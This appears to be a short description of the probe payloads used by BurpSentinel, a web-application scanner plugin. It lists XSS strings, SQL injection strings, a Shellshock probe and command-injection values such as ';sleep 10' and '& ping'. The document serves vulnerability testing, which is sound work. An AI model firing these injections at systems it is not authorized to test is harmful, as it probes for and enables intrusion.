BurpSentinel Payloads

Based on my presentation on BSidesVienna 2014: http://www.slideshare.net/nibod/bsides-viennasentinel-v04 A short description of the payloads used by BurpSentinel. The payloads are developed to be as efficient as possible. There should be no unecessary payloads.

XSS

If the web app returns <p>", it is vulnerable to XSS.

For tag based injection:

%3Cp%3E%22
<p>"

Both of the above will be sent like written above. The 2nd, unencoded version will be not exploitable in real life if the parameter is in GET (HTTP URL).

For tag value based injection:

%22%3D
"=

Both of the above will be sent like written above. The 2nd, unencoded version will be not exploitable in real life if the parameter is in GET (HTTP URL).

SQL

The SQL tests are positive-based. The BREAK request should return another response than the original request. If not, we will not perform any additional scans. If one of the follow up request is identical to the original request, the webapp is most likely vulnerable to SQLi.

SQLu

The old SQL tests:

'BREAK"

OR 41=41
' OR '41'='41
" OR "41"="41

/**/

) OR (41=41
') OR ('41'='41
") OR ("41"="41"

If the attack vector is in POST (HTTP body), try each of the above with and without URL encoding. For GET (HTTP URL), just use URL encoding.

SQLs

The new SQL tests:

'BREAK"

ORIG+1-1
ORIG'+0+'0

ORIG[0]' || 'ORIG[1-END]
ORIG[0]' + 'ORIG[1-END]
ORIG[0]' 'ORIG[1-END]
/**/ORIG

If the attack vector is in POST (HTTP body), try each of the above with and without URL encoding. For GET (HTTP URL), just use URL encoding.

Other

The tests include command execution tests, and also shellshock. Additionally it will test null bytes (%00) and tries file inclusion positive test.

.\
./
() { :;}; sleep 10
%00
;sleep 10
\" ;sleep 10
';sleep 10
|sleep 10
& ping -c 10 127.0.0.1
\" & ping -c 10 127.0.0.1
' & ping -c 10 127.0.0.1